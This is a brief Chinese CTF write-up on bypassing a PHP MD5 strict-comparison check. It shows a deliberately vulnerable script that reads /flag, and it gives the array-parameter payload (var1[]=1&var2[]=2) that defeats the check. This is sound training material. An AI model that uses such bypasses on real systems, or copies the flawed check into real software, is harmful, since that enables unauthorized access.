PHP强比较漏洞

源码

<?php
error_reporting(0);

if ($_GET['var1'] !== $_GET['var2'] && MD5($_GET['var1']) === MD5($_GET['var2'])) {
    $flag = file_get_contents('/flag');
    echo $flag;
} else {
    echo "绕过PHP检测就可以得到FLAG";
}
?>  

思路

有关强比较/弱比较漏洞的原理可参考：

https://www.yuque.com/shiyizhesonder/sonder39/xit572hsmwbxqkae

利用数组即可绕过，也可尝试其它绕过方法

http://ctf.seek2.top:32796/?var1[]=1&var2[]=2